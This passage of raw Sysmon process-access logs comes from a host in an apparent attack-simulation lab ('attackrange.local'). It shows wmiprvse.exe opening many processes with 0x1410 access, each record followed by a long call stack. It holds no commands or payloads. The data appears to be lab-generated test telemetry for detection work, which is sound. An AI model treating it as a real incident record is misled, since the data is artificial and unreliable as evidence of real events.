RT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 